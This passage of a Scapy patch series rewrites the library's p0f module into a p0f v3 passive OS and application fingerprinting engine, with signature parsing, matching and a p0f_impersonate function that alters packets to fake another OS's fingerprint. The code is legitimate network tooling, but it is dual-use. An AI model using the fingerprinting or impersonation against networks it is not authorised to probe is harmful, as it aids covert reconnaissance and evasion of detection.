realtime: check that a packet was sent before sending the next one diff --git a/scapy/utils.py b/scapy/utils.py index 0f2cdfa71cd..b1e35abd399 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -2323,7 +2323,7 @@ def pretty_list(rtlst, # type: List[Tuple[Union[str, List[str]], ...]] :param rtlst: a list of tuples. each tuple contains a value which can be either a string or a list of string. - :param sortBy: the column id (starting with 0) which whill be used for + :param sortBy: the column id (starting with 0) which will be used for ordering :param borders: whether to put borders on the table or not """ From ec200e81a2fb483fce21f0fbb75b47ab9a27a3c9 Mon Sep 17 00:00:00 2001 From: Itay Margolin <66025517+Nisitay@users.noreply.github.com> Date: Fri, 30 Jul 2021 16:37:29 +0300 Subject: [PATCH 0615/1632] p0fv3 support - tcp/http/mtu passive fingerprinting (#3259) * p0fv3 support - tcp/http/mtu passive fingerprinting * Changed the kb structure, added parsing for 'sys' lines and more detailed signature structure. * Added p0fv3 tests and modified the p0fv2 tests to fit new module name * Added prnp0f function and sig2str to convert a tuple signature to str * Added MTU fingerprinting in prnp0f on SYN/SYN+ACK packets * Fixed HTTP headers_correl function and reverted mtu changes * Fixed IP ECN parsing * Fixed TCP ECN parsing * Fixed tests * Changed signature & record tuples to organized classes * Added p0f_impersonate + tests * Fix typo Co-authored-by: gpotter2 --- scapy/modules/p0f.py | 1424 +++++++++++++++++++++++++--------------- scapy/modules/p0fv2.py | 623 ++++++++++++++++++ test/p0f.uts | 141 ++-- test/p0fv2.uts | 122 ++++ 4 files changed, 1695 insertions(+), 615 deletions(-) create mode 100644 scapy/modules/p0fv2.py create mode 100644 test/p0fv2.uts diff --git a/scapy/modules/p0f.py b/scapy/modules/p0f.py index 5a0b562d6e5..73f4eebe094 100644 --- a/scapy/modules/p0f.py +++ b/scapy/modules/p0f.py @@ -4,619 +4,955 @@ # This program is published under a GPLv2 license """ -Clone of p0f passive OS fingerprinting +Clone of p0f v3 passive OS fingerprinting """ from __future__ import absolute_import from __future__ import print_function -import time +import re import struct -import os -import socket import random from scapy.data import KnowledgeBase, select_path from scapy.config import conf -from scapy.compat import raw +from scapy.compat import raw, orb +from scapy.packet import NoPayload from scapy.layers.inet import IP, TCP, TCPOptions -from scapy.packet import NoPayload, Packet -from scapy.error import warning, Scapy_Exception, log_runtime -from scapy.volatile import RandInt, RandByte, RandNum, RandShort, RandString -from scapy.sendrecv import sniff -from scapy.modules import six -if conf.route is None: - # unused import, only to initialize conf.route - import scapy.route # noqa: F401 +from scapy.layers.http import HTTP, HTTPRequest, HTTPResponse +from scapy.layers.inet6 import IPv6 +from scapy.volatile import RandByte, RandShort, RandString +from scapy.error import warning +from scapy.modules.six import integer_types, string_types +from scapy.modules.six.moves import range _p0fpaths = ["/etc/p0f", "/usr/share/p0f", "/opt/local"] - conf.p0f_base = select_path(_p0fpaths, "p0f.fp") -conf.p0fa_base = select_path(_p0fpaths, "p0fa.fp") -conf.p0fr_base = select_path(_p0fpaths, "p0fr.fp") -conf.p0fo_base = select_path(_p0fpaths, "p0fo.fp") - - -############### -# p0f stuff # -############### - -# File format (according to p0f.fp) : -# -# wwww:ttt:D:ss:OOO...:QQ:OS:Details -# -# wwww - window size -# ttt - initial TTL -# D - don't fragment bit (0=unset, 1=set) -# ss - overall SYN packet size -# OOO - option value and order specification -# QQ - quirks list -# OS - OS genre -# details - OS description -class p0fKnowledgeBase(KnowledgeBase): - def __init__(self, filename): - KnowledgeBase.__init__(self, filename) - # self.ttl_range=[255] +MIN_TCP4 = 40 # Min size of IPv4/TCP headers +MIN_TCP6 = 60 # Min size of IPv6/TCP headers +MAX_DIST = 35 # Maximum TTL distance for non-fuzzy signature matching + +WIN_TYPE_NORMAL = 0 # Literal value +WIN_TYPE_ANY = 1 # Wildcard +WIN_TYPE_MOD = 2 # Modulo check +WIN_TYPE_MSS = 3 # Window size MSS multiplier +WIN_TYPE_MTU = 4 # Window size MTU multiplier + +# Convert TCP option num to p0f (nop is handled separately) +tcp_options_p0f = { + 2: "mss", # maximum segment size + 3: "ws", # window scaling + 4: "sok", # selective ACK permitted + 5: "sack", # selective ACK (should not be seen) + 8: "ts", # timestamp +} + + +# Signatures +class TCP_Signature(object): + __slots__ = ["olayout", "quirks", "ip_opt_len", "ip_ver", "ttl", + "mss", "win", "win_type", "wscale", "pay_class", "ts1"] + + def __init__(self, olayout, quirks, ip_opt_len, ip_ver, ttl, + mss, win, win_type, wscale, pay_class, ts1): + self.olayout = olayout + self.quirks = quirks + self.ip_opt_len = ip_opt_len + self.ip_ver = ip_ver + self.ttl = ttl + self.mss = mss + self.win = win + self.win_type = win_type # None for packet signatures + self.wscale = wscale + self.pay_class = pay_class + self.ts1 = ts1 # None for base signatures + + @classmethod + def from_packet(cls, pkt): + """ + Receives a TCP packet (assuming it's valid), and returns + a TCP_Signature object + """ + ip_ver = pkt.version + quirks = set() + + def addq(name): + quirks.add(name) + + # IPv4/IPv6 parsing + if ip_ver == 4: + ttl = pkt.ttl + ip_opt_len = (pkt.ihl * 4) - 20 + if pkt.tos & (0x01 | 0x02): + addq("ecn") + if pkt.flags.evil: + addq("0+") + if pkt.flags.DF: + addq("df") + if pkt.id: + addq("id+") + elif pkt.id == 0: + addq("id-") + else: + ttl = pkt.hlim + ip_opt_len = 0 + if pkt.fl: + addq("flow") + if pkt.tc & (0x01 | 0x02): + addq("ecn") + + # TCP parsing + tcp = pkt[TCP] + win = tcp.window + if tcp.flags & (0x40 | 0x80 | 0x01): + addq("ecn") + if tcp.seq == 0: + addq("seq-") + if tcp.flags.A: + if tcp.ack == 0: + addq("ack-") + elif tcp.ack: + addq("ack+") + if tcp.flags.U: + addq("urgf+") + elif tcp.urgptr: + addq("uptr+") + if tcp.flags.P: + addq("pushf+") + + pay_class = 1 if tcp.payload else 0 + + # Manual TCP options parsing + mss = 0 + wscale = 0 + ts1 = 0 + olayout = "" + optlen = (tcp.dataofs << 2) - 20 + x = raw(tcp)[-optlen:] # raw bytes of TCP options + while x: + onum = orb(x[0]) + if onum == 0: + x = x[1:] + olayout += "eol+%i," % len(x) + if x.strip(b"\x00"): # non-zero past EOL + addq("opt+") + break + if onum == 1: + x = x[1:] + olayout += "nop," + continue + try: + olen = orb(x[1]) + except IndexError: # no room for length field + addq("bad") + break + oval = x[2:olen] + if onum in tcp_options_p0f: + ofmt = TCPOptions[0][onum][1] + olayout += "%s," % tcp_options_p0f[onum] + optsize = 2 + struct.calcsize(ofmt) if ofmt else 2 # total len + if len(x) < optsize: # option would end past end of header + addq("bad") + break + + if onum == 5: + if olen < 10 or olen > 34: # SACK length out of range + addq("bad") + break + else: + if olen != optsize: # length field doesn't fit option type + addq("bad") + break + if ofmt: + oval = struct.unpack(ofmt, oval) + if len(oval) == 1: + oval = oval[0] + if onum == 2: + mss = oval + elif onum == 3: + wscale = oval + if wscale > 14: + addq("exws") + elif onum == 8: + ts1 = oval[0] + if not ts1: + addq("ts1-") + if oval[1] and (tcp.flags.S and not tcp.flags.A): + addq("ts2+") + else: # Unknown option, presumably with specified size + if olen < 2 or olen > 40 or olen > len(x): + addq("bad") + break + x = x[olen:] + olayout = olayout[:-1] + + return cls(olayout, quirks, ip_opt_len, ip_ver, ttl, mss, win, None, wscale, pay_class, ts1) # noqa: E501 + + @classmethod + def from_raw_sig(cls, sig_line): + """ + Parses a TCP sig line and returns a tuple consisting of a + TCP_Signature object and bad_ttl as bool + """ + ver, ttl, olen, mss, wsize, olayout, quirks, pclass = lparse(sig_line, 8) # noqa: E501 + wsize, _, scale = wsize.partition(",") + + ip_ver = -1 if ver == "*" else int(ver) + ttl, bad_ttl = (int(ttl[:-1]), True) if ttl[-1] == "-" else (int(ttl), False) # noqa: E501 + ip_opt_len = int(olen) + mss = -1 if mss == "*" else int(mss) + if wsize == "*": + win, win_type = (0, WIN_TYPE_ANY) + elif wsize[:3] == "mss": + win, win_type = (int(wsize[4:]), WIN_TYPE_MSS) + elif wsize[0] == "%": + win, win_type = (int(wsize[1:]), WIN_TYPE_MOD) + elif wsize[:3] == "mtu": + win, win_type = (int(wsize[4:]), WIN_TYPE_MTU) + else: + win, win_type = (int(wsize), WIN_TYPE_NORMAL) + wscale = -1 if scale == "*" else int(scale) + if quirks: + quirks = frozenset(q for q in quirks.split(",")) + else: + quirks = frozenset() + pay_class = -1 if pclass == "*" else int(pclass == "+") + + sig = cls(olayout, quirks, ip_opt_len, ip_ver, ttl, mss, win, win_type, wscale, pay_class, None) # noqa: E501 + return sig, bad_ttl + + def __str__(self): + quirks = ",".join(q for q in self.quirks) + fmt = "%i:%i+%i:%i:%i:%i,%i:%s:%s:%i" + s = fmt % (self.ip_ver, self.ttl, guess_dist(self.ttl), + self.ip_opt_len, self.mss, self.win, self.wscale, + self.olayout, quirks, self.pay_class) + return s + + +class HTTP_Signature(object): + __slots__ = ["http_ver", "hdr", "hdr_set", "habsent", "sw"] + + def __init__(self, http_ver, hdr, hdr_set, habsent, sw): + self.http_ver = http_ver + self.hdr = hdr + self.hdr_set = hdr_set + self.habsent = habsent # None for packet signatures + self.sw = sw + + @classmethod + def from_packet(cls, pkt): + """ + Receives an HTTP packet (assuming it's valid), and returns + a HTTP_Signature object + """ + http_payload = raw(pkt[TCP].payload) + + crlfcrlf = b"\r\n\r\n" + crlfcrlfIndex = http_payload.find(crlfcrlf) + if crlfcrlfIndex != -1: + headers = http_payload[:crlfcrlfIndex + len(crlfcrlf)] + else: + headers = http_payload + headers = headers.decode() # XXX: Check if this could fail + first_line, headers = headers.split("\r\n", 1) + + if "1.0" in first_line: + http_ver = 0 + elif "1.1" in first_line: + http_ver = 1 + else: + raise ValueError("HTTP version is not 1.0/1.1") + + sw = "" + headers_found = [] + hdr_set = set() + for header_line in headers.split("\r\n"): + name, _, value = header_line.partition(":") + if value: + value = value.strip() + headers_found.append((name, value)) + hdr_set.add(name) + if name in ("User-Agent", "Server"): + sw = value + hdr = tuple(headers_found) + return cls(http_ver, hdr, hdr_set, None, sw) + + @classmethod + def from_raw_sig(cls, sig_line): + """ + Parses an HTTP sig line and returns a HTTP_Signature object + """ + ver, horder, habsent, expsw = lparse(sig_line, 4) + http_ver = -1 if ver == "*" else int(ver) + + # horder parsing - split by commas that aren't in [] + new_horder = [] + for header in re.split(r",(?![^\[]*\])", horder): + name, _, value = header.partition("=") + if name[0] == "?": # Optional header + new_horder.append((name[1:], value[1:-1], True)) + else: + new_horder.append((name, value[1:-1], False)) + hdr = tuple(new_horder) + hdr_set = frozenset(header[0] for header in hdr if not header[2]) + habsent = frozenset(habsent.split(",")) + return cls(http_ver, hdr, hdr_set, habsent, expsw) + + def __str__(self): + # values that depend on the context are not included in the string + skipval = ("Host", "User-Agent", "Date", "Content-Type", "Server") + hdr = ",".join(n if n in skipval else "%s=[%s]" % (n, v) for n, v in self.hdr) # noqa: E501 + fmt = "%i:%s::%s" + s = fmt % (self.http_ver, hdr, self.sw) + return s + + +# Records +class MTU_Record(object): + __slots__ = ["label_id", "mtu"] + + def __init__(self, label_id, sig_line): + self.label_id = label_id + self.mtu = int(sig_line) + +class TCP_Record(object): + __slots__ = ["label_id", "bad_ttl", "sig"] + + def __init__(self, label_id, sig_line): + self.label_id = label_id + sig, bad_ttl = TCP_Signature.from_raw_sig(sig_line) + self.bad_ttl = bad_ttl + self.sig = sig + + +class HTTP_Record(object): + __slots__ = ["label_id", "sig"] + + def __init__(self, label_id, sig_line): + self.label_id = label_id + self.sig = HTTP_Signature.from_raw_sig(sig_line) + + +class p0fKnowledgeBase(KnowledgeBase): + """ + self.base = { + "mtu" (str): [sig(tuple), ...] + "tcp"/"http" (str): { + direction (str): [sig(tuple), ...] + } + } + self.labels = (label(tuple), ...) + """ def lazy_init(self): try: f = open(self.filename) - except IOError: + except Exception: warning("Can't open base %s", self.filename) return - try: - self.base = [] - for line in f: - if line[0] in ["#", "\n"]: + + self.base = {} + self.labels = [] + self._parse_file(f) + self.labels = tuple(self.labels) + f.close() + + def _parse_file(self, file): + """ + Parses p0f.fp file and stores the data with described structures. + """ + label_id = -1 + + for line in file: + if line[0] in (";", "\n"): + continue + line = line.strip() + + if line[0] == "[": + section, direction = lparse(line[1:-1], 2) + if section == "mtu": + self.base[section] = [] + curr_records = self.base[section] + else: + if section not in self.base: + self.base[section] = {direction: []} + elif direction not in self.base[section]: + self.base[section][direction] = [] + curr_records = self.base[section][direction] + else: + param, _, val = line.partition(" = ") + param = param.strip() + + if param == "sig": + if section == "mtu": + record_class = MTU_Record + elif section == "tcp": + record_class = TCP_Record + elif section == "http": + record_class = HTTP_Record + curr_records.append(record_class(label_id, val)) + + elif param == "label": + label_id += 1 + if section == "mtu": + self.labels.append(val) + continue + # label = type:class:name:flavor + t, c, name, flavor = lparse(val, 4) + self.labels.append((t, c, name, flavor)) + + elif param == "sys": + sys_names = tuple(name for name in val.split(",")) + self.labels[label_id] += (sys_names,) + + def get_sigs_by_os(self, direction, osgenre, osdetails=None): + """Get TCP signatures that match an OS genre and details (if specified). + If osdetails isn't specified, then we pick all signatures + that match osgenre. + + Examples: + >>> p0fdb.get_sigs_by_os("request", "Linux", "2.6") + >>> p0fdb.get_sigs_by_os("response", "Windows", "8") + >>> p0fdb.get_sigs_by_os("request", "FreeBSD") + """ + sigs = [] + for tcp_record in self.base["tcp"][direction]: + label = self.labels[tcp_record.label_id] + name, flavor = label[2], label[3] + if osgenre and osgenre == name: + if osdetails: + if osdetails in flavor: + sigs.append(tcp_record.sig) + else: + sigs.append(tcp_record.sig) + return sigs + + def tcp_find_match(self, ts, direction): + """ + Finds the best match for the given signature and direction. + If a match is found, returns a tuple consisting of: + - label: the matched label + - dist: guessed distance from the packet source + - fuzzy: whether the match is fuzzy + Returns None if no match was found + """ + win_multi, use_mtu = detect_win_multi(ts) + + gmatch = None # generic match + fmatch = None # fuzzy match + for tcp_record in self.base["tcp"][direction]: + rs = tcp_record.sig + + fuzzy = False + ref_quirks = rs.quirks + + if rs.olayout != ts.olayout: + continue + + if rs.ip_ver == -1: + ref_quirks -= {"flow"} if ts.ip_ver == 4 else {"df", "id+", "id-"} # noqa: E501 + + if ref_quirks != ts.quirks: + deleted = (ref_quirks ^ ts.quirks) & ref_quirks + added = (ref_quirks ^ ts.quirks) & ts.quirks + + if (fmatch or (deleted - {"df", "id+"}) or (added - {"id-", "ecn"})): # noqa: E501 continue - line = tuple(line.split(":")) - if len(line) < 8: + fuzzy = True + + if rs.ip_opt_len != ts.ip_opt_len: + continue + if tcp_record.bad_ttl: + if rs.ttl < ts.ttl: continue + else: + if rs.ttl < ts.ttl or rs.ttl - ts.ttl > MAX_DIST: + fuzzy = True - def a2i(x): - if x.isdigit(): - return int(x) - return x - li = [a2i(e) for e in line[1:4]] - # if li[0] not in self.ttl_range: - # self.ttl_range.append(li[0]) - # self.ttl_range.sort() - self.base.append((line[0], li[0], li[1], li[2], line[4], - line[5], line[6], line[7][:-1])) - except Exception: - warning("Can't parse p0f database (new p0f version ?)") - self.base = None - f.close() + if ((rs.mss != -1 and rs.mss != ts.mss) or + (rs.wscale != -1 and rs.wscale != ts.wscale) or + (rs.pay_class != -1 and rs.pay_class != ts.pay_class)): + continue + if rs.win_type == WIN_TYPE_NORMAL: + if rs.win != ts.win: + continue + elif rs.win_type == WIN_TYPE_MOD: + if ts.win % rs.win: + continue + elif rs.win_type == WIN_TYPE_MSS: + if (use_mtu or rs.win != win_multi): + continue + elif rs.win_type == WIN_TYPE_MTU: + if (not use_mtu or rs.win != win_multi): + continue -p0f_kdb, p0fa_kdb, p0fr_kdb, p0fo_kdb = None, None, None, None + # Got a match? If not fuzzy, return. If fuzzy, keep looking. + label = self.labels[tcp_record.label_id] + match = (label, rs.ttl - ts.ttl, fuzzy) + if not fuzzy: + if label[0] == "s": + return match + elif not gmatch: + gmatch = match + elif not fmatch: + fmatch = match + + if gmatch: + return gmatch + if fmatch: + return fmatch + return None + def http_find_match(self, ts, direction): + """ + Finds the best match for the given signature and direction. + If a match is found, returns a tuple consisting of: + - label: the matched label + - dishonest: whether the software was detected as dishonest + Returns None if no match was found + """ + gmatch = None # generic match + for http_record in self.base["http"][direction]: + rs = http_record.sig + + if rs.http_ver != -1 and rs.http_ver != ts.http_ver: + continue + + # Check that all non-optional headers appear in the packet + if not (ts.hdr_set & rs.hdr_set) == rs.hdr_set: + continue + + # Check that no forbidden headers appear in the packet. + if len(rs.habsent & ts.hdr_set) > 0: + continue + + def headers_correl(): + phi = 0 # Packet HTTP header index + hdr_len = len(ts.hdr) + + # Confirm the ordering and values of headers + # (this is relatively slow, hence the if statements above). + # The algorithm is derived from the original p0f/fp_http.c + for kh in rs.hdr: + orig_phi = phi + while (phi < hdr_len and + kh[0] != ts.hdr[phi][0]): + phi += 1 + + if phi == hdr_len: + if not kh[2]: + return False + + for ph in ts.hdr: + if kh[0] == ph[0]: + return False + + phi = orig_phi + continue + + if kh[1] not in ts.hdr[phi][1]: + return False + phi += 1 + return True + + if not headers_correl(): + continue + + # Got a match + label = self.labels[http_record.label_id] + dishonest = rs.sw and ts.sw and rs.sw not in ts.sw + match = (label, dishonest) + if label[0] == "s": + return match + elif not gmatch: + gmatch = match + return gmatch if gmatch else None + + def mtu_find_match(self, mtu): + """ + Finds a match for the given MTU. + If a match is found, returns the label string. + Returns None if no match was found + """ + for mtu_record in self.base["mtu"]: + if mtu == mtu_record.mtu: + return self.labels[mtu_record.label_id] + return None -def p0f_load_knowledgebases(): - global p0f_kdb, p0fa_kdb, p0fr_kdb, p0fo_kdb - p0f_kdb = p0fKnowledgeBase(conf.p0f_base) - p0fa_kdb = p0fKnowledgeBase(conf.p0fa_base) - p0fr_kdb = p0fKnowledgeBase(conf.p0fr_base) - p0fo_kdb = p0fKnowledgeBase(conf.p0fo_base) +p0fdb = p0fKnowledgeBase(conf.p0f_base) -p0f_load_knowledgebases() +def guess_dist(ttl): + for ottl in (32, 64, 128, 255): + if ttl <= ottl: + return ottl - ttl -def p0f_selectdb(flags): - # tested flags: S, R, A - if flags & 0x16 == 0x2: - # SYN - return p0f_kdb - elif flags & 0x16 == 0x12: - # SYN/ACK - return p0fa_kdb - elif flags & 0x16 in [0x4, 0x14]: - # RST RST/ACK - return p0fr_kdb - elif flags & 0x16 == 0x10: - # ACK - return p0fo_kdb - else: - return None +def lparse(line, n, delimiter=":", default=""): + """ + Parsing of 'a:b:c:d:e' lines + """ + a = line.split(delimiter)[:n] + for elt in a: + yield elt + for _ in range(n - len(a)): + yield default -def packet2p0f(pkt): + +def validate_packet(pkt): + """ + Validate that the packet is an IPv4/IPv6 and TCP packet. + If the packet is valid, a copy is returned. If not, TypeError is raised. + """ pkt = pkt.copy() + valid = pkt.haslayer(TCP) and (pkt.haslayer(IP) or pkt.haslayer(IPv6)) + if not valid: + raise TypeError("Not a TCP/IP packet") + return pkt + + +def detect_win_multi(ts): + """ + Figure out if window size is a multiplier of MSS or MTU. + Receives a TCP signature and returns the multiplier and + whether mtu should be used + """ + mss = ts.mss + win = ts.win + if not win or mss < 100: + return -1, False + + options = [ + (mss, False), + (1500 - MIN_TCP4, False), + (1500 - MIN_TCP4 - 12, False), + (mss + MIN_TCP4, True), + (1500, True) + ] + if ts.ts1: + options.append((mss - 12, False)) + if ts.ip_ver == 6: + options.append((1500 - MIN_TCP6, False)) + options.append((1500 - MIN_TCP6 - 12, False)) + options.append((mss + MIN_TCP6, True)) + + for div, use_mtu in options: + if not win % div: + return win / div, use_mtu + return -1, False + + +def packet2p0f(pkt): + """ + Returns a p0f signature of the packet, and the direction. + Raises TypeError if the packet isn't valid for p0f + """ + pkt = validate_packet(pkt) pkt = pkt.__class__(raw(pkt)) - while pkt.haslayer(IP) and pkt.haslayer(TCP): - pkt = pkt.getlayer(IP) - if isinstance(pkt.payload, TCP): - break - pkt = pkt.payload - if not isinstance(pkt, IP) or not isinstance(pkt.payload, TCP): - raise TypeError("Not a TCP/IP packet") - # if pkt.payload.flags & 0x7 != 0x02: #S,!F,!R - # raise TypeError("Not a SYN or SYN/ACK packet") - - db = p0f_selectdb(pkt.payload.flags) - - # t = p0f_kdb.ttl_range[:] - # t += [pkt.ttl] - # t.sort() - # ttl=t[t.index(pkt.ttl)+1] - ttl = pkt.ttl - - ss = len(pkt) - # from p0f/config.h : PACKET_BIG = 100 - if ss > 100: - if db == p0fr_kdb: - # p0fr.fp: "Packet size may be wildcarded. The meaning of - # wildcard is, however, hardcoded as 'size > - # PACKET_BIG'" - ss = '*' + if pkt[TCP].flags.S: + if pkt[TCP].flags.A: + direction = "response" else: - ss = 0 - if db == p0fo_kdb: - # p0fo.fp: "Packet size MUST be wildcarded." - ss = '*' - - ooo = "" - mss = -1 - qqT = False - qqP = False - # qqBroken = False - ilen = (pkt.payload.dataofs << 2) - 20 # from p0f.c - for option in pkt.payload.options: - ilen -= 1 - if option[0] == "MSS": - ooo += "M" + str(option[1]) + "," - mss = option[1] - # FIXME: qqBroken - ilen -= 3 - elif option[0] == "WScale": - ooo += "W" + str(option[1]) + "," - # FIXME: qqBroken - ilen -= 2 - elif option[0] == "Timestamp": - if option[1][0] == 0: - ooo += "T0," - else: - ooo += "T," - if option[1][1] != 0: - qqT = True - ilen -= 9 - elif option[0] == "SAckOK": - ooo += "S," - ilen -= 1 - elif option[0] == "NOP": - ooo += "N," - elif option[0] == "EOL": - ooo += "E," - if ilen > 0: - qqP = True + direction = "request" + sig = TCP_Signature.from_packet(pkt) + + elif pkt[TCP].payload: + # XXX: guess_payload_class doesn't use any class related attributes + pclass = HTTP().guess_payload_class(raw(pkt[TCP].payload)) + if pclass == HTTPRequest: + direction = "request" + elif pclass == HTTPResponse: + direction = "response" else: - if isinstance(option[0], str): - ooo += "?%i," % TCPOptions[1][option[0]] - else: - ooo += "?%i," % option[0] - # FIXME: ilen - ooo = ooo[:-1] - if ooo == "": - ooo = "." - - win = pkt.payload.window - if mss != -1: - if mss != 0 and win % mss == 0: - win = "S" + str(win / mss) - elif win % (mss + 40) == 0: - win = "T" + str(win / (mss + 40)) - win = str(win) - - qq = "" - - if db == p0fr_kdb: - if pkt.payload.flags & 0x10 == 0x10: - # p0fr.fp: "A new quirk, 'K', is introduced to denote - # RST+ACK packets" - qq += "K" - # The two next cases should also be only for p0f*r*, but although - # it's not documented (or I have not noticed), p0f seems to - # support the '0' and 'Q' quirks on any databases (or at the least - # "classical" p0f.fp). - if pkt.payload.seq == pkt.payload.ack: - # p0fr.fp: "A new quirk, 'Q', is used to denote SEQ number - # equal to ACK number." - qq += "Q" - if pkt.payload.seq == 0: - # p0fr.fp: "A new quirk, '0', is used to denote packets - # with SEQ number set to 0." - qq += "0" - if qqP: - qq += "P" - if pkt.id == 0: - qq += "Z" - if pkt.options != []: - qq += "I" - if pkt.payload.urgptr != 0: - qq += "U" - if pkt.payload.reserved != 0: - qq += "X" - if pkt.payload.ack != 0: - qq += "A" - if qqT: - qq += "T" - if db == p0fo_kdb: - if pkt.payload.flags & 0x20 != 0: - # U - # p0fo.fp: "PUSH flag is excluded from 'F' quirk checks" - qq += "F" + raise TypeError("Not an HTTP payload") + sig = HTTP_Signature.from_packet(pkt) else: - if pkt.payload.flags & 0x28 != 0: - # U or P - qq += "F" - if db != p0fo_kdb and not isinstance(pkt.payload.payload, NoPayload): - # p0fo.fp: "'D' quirk is not checked for." - qq += "D" - # FIXME : "!" - broken options segment: not handled yet - - if qq == "": - qq = "." - - return (db, (win, ttl, pkt.flags.DF, ss, ooo, qq)) - - -def p0f_correl(x, y): - d = 0 - # wwww can be "*" or "%nn". "Tnn" and "Snn" should work fine with - # the x[0] == y[0] test. - d += (x[0] == y[0] or y[0] == "*" or (y[0][0] == "%" and x[0].isdigit() and (int(x[0]) % int(y[0][1:])) == 0)) # noqa: E501 - # ttl - d += (y[1] >= x[1] and y[1] - x[1] < 32) - for i in [2, 5]: - d += (x[i] == y[i] or y[i] == '*') - # '*' has a special meaning for ss - d += x[3] == y[3] - xopt = x[4].split(",") - yopt = y[4].split(",") - if len(xopt) == len(yopt): - same = True - for i in range(len(xopt)): - if not (xopt[i] == yopt[i] or - (len(yopt[i]) == 2 and len(xopt[i]) > 1 and - yopt[i][1] == "*" and xopt[i][0] == yopt[i][0]) or - (len(yopt[i]) > 2 and len(xopt[i]) > 1 and - yopt[i][1] == "%" and xopt[i][0] == yopt[i][0] and - int(xopt[i][1:]) % int(yopt[i][2:]) == 0)): - same = False - break - if same: - d += len(xopt) - return d + raise TypeError("Not a SYN, SYN/ACK, or HTTP packet") + return sig, direction + + +def fingerprint_mtu(pkt): + """ + Fingerprints the MTU based on the maximum segment size specified + in TCP options. + If a match was found, returns the label. If not returns None + """ + pkt = validate_packet(pkt) + mss = 0 + for name, value in pkt.payload.options: + if name == "MSS": + mss = value + + if not mss: + return None + + mtu = (mss + MIN_TCP4) if pkt.version == 4 else (mss + MIN_TCP6) + + if not p0fdb.get_base(): + warning("p0f base empty.") + return None + + return p0fdb.mtu_find_match(mtu) -@conf.commands.register def p0f(pkt): - """Passive OS fingerprinting: which OS emitted this TCP packet ? -p0f(packet) -> accuracy, [list of guesses] -""" - db, sig = packet2p0f(pkt) - if db: - pb = db.get_base() - else: - pb = [] - if not pb: + sig, direction = packet2p0f(pkt) + if not p0fdb.get_base(): warning("p0f base empty.") - return [] - # s = len(pb[0][0]) - r = [] - max = len(sig[4].split(",")) + 5 - for b in pb: - d = p0f_correl(sig, b) - if d == max: - r.append((b[6], b[7], b[1] - pkt[IP].ttl)) - return r + return None + + if isinstance(sig, TCP_Signature): + return p0fdb.tcp_find_match(sig, direction) + else: + return p0fdb.http_find_match(sig, direction) def prnp0f(pkt): - """Calls p0f and returns a user-friendly output""" - # we should print which DB we use + """Calls p0f and prints a user-friendly output""" try: r = p0f(pkt) except Exception: return - if r == []: - r = ("UNKNOWN", "[" + ":".join(map(str, packet2p0f(pkt)[1])) + ":?:?]", None) # noqa: E501 + + sig, direction = packet2p0f(pkt) + is_tcp_sig = isinstance(sig, TCP_Signature) + to_server = direction == "request" + + if is_tcp_sig: + pkt_type = "SYN" if to_server else "SYN+ACK" else: - r = r[0] - uptime = None - try: - uptime = pkt2uptime(pkt) - except Exception: - pass - if uptime == 0: - uptime = None - res = pkt.sprintf("%IP.src%:%TCP.sport% - " + r[0] + " " + r[1]) - if uptime is not None: - res += pkt.sprintf(" (up: " + str(uptime / 3600) + " hrs)\n -> %IP.dst%:%TCP.dport% (%TCP.flags%)") # noqa: E501 + pkt_type = "HTTP Request" if to_server else "HTTP Response" + + res = pkt.sprintf(".-[ %IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport% (" + pkt_type + ") ]-\n|\n") # noqa: E501 + fields = [] + + def add_field(name, value): + fields.append("| %-8s = %s\n" % (name, value)) + + cli_or_svr = "Client" if to_server else "Server" + add_field(cli_or_svr, pkt.sprintf("%IP.src%:%TCP.sport%")) + + if r: + label = r[0] + app_or_os = "App" if label[1] == "!" else "OS" + add_field(app_or_os, label[2] + " " + label[3]) + if len(label) == 5: # label includes sys + add_field("Sys", ", ".join(name for name in label[4])) + if is_tcp_sig: + add_field("Distance", r[1]) else: - res += pkt.sprintf("\n -> %IP.dst%:%TCP.dport% (%TCP.flags%)") - if r[2] is not None: - res += " (distance " + str(r[2]) + ")" - print(res) + app_or_os = "OS" if is_tcp_sig else "App" + add_field(app_or_os, "UNKNOWN") + add_field("Raw sig", str(sig)) -@conf.commands.register -def pkt2uptime(pkt, HZ=100): - """Calculate the date the machine which emitted the packet booted using TCP timestamp # noqa: E501 -pkt2uptime(pkt, [HZ=100])""" - if not isinstance(pkt, Packet): - raise TypeError("Not a TCP packet") - if isinstance(pkt, NoPayload): - raise TypeError("Not a TCP packet") - if not isinstance(pkt, TCP): - return pkt2uptime(pkt.payload) - for opt in pkt.options: - if opt[0] == "Timestamp": - # t = pkt.time - opt[1][0] * 1.0/HZ - # return time.ctime(t) - t = opt[1][0] / HZ - return t - raise TypeError("No timestamp option") + res += "".join(fields) + res += "`____\n" + print(res) def p0f_impersonate(pkt, osgenre=None, osdetails=None, signature=None, extrahops=0, mtu=1500, uptime=None): """Modifies pkt so that p0f will think it has been sent by a -specific OS. If osdetails is None, then we randomly pick up a -personality matching osgenre. If osgenre and signature are also None, -we use a local signature (using p0f_getlocalsigs). If signature is -specified (as a tuple), we use the signature. + specific OS. Either osgenre or signature is required to impersonate. + If signature is specified (as a raw string), we use the signature. + signature format: + "ip_ver:ttl:ip_opt_len:mss:window,wscale:opt_layout:quirks:pay_class" -For now, only TCP Syn packets are supported. -Some specifications of the p0f.fp file are not (yet) implemented.""" - pkt = pkt.copy() - # pkt = pkt.__class__(raw(pkt)) - while pkt.haslayer(IP) and pkt.haslayer(TCP): - pkt = pkt.getlayer(IP) - if isinstance(pkt.payload, TCP): - break - pkt = pkt.payload - - if not isinstance(pkt, IP) or not isinstance(pkt.payload, TCP): - raise TypeError("Not a TCP/IP packet") + If osgenre is specified, we randomly pick a signature with a label + that matches osgenre (and osdetails, if specified). + Note: osgenre is case sensitive ("linux" -> "Linux" etc.), and osdetails + is a substring of a label flavor ("7", "8" and "7 or 8" will + all match the label "s:win:Windows:7 or 8") + + For now, only TCP SYN/SYN+ACK packets are supported.""" + pkt = validate_packet(pkt) + + if not osgenre and not signature: + raise ValueError("osgenre or signature is required to impersonate!") - db = p0f_selectdb(pkt.payload.flags) - if osgenre: - pb = db.get_base() - if pb is None: - pb = [] - pb = [x for x in pb if x[6] == osgenre] - if osdetails: - pb = [x for x in pb if x[7] == osdetails] - elif signature: - pb = [signature] + tcp = pkt[TCP] + tcp_type = tcp.flags & (0x02 | 0x10) # SYN / SYN+ACK + + if signature: + if isinstance(signature, string_types): + sig, _ = TCP_Signature.from_raw_sig(signature) + else: + raise TypeError("Unsupported signature type") else: - pb 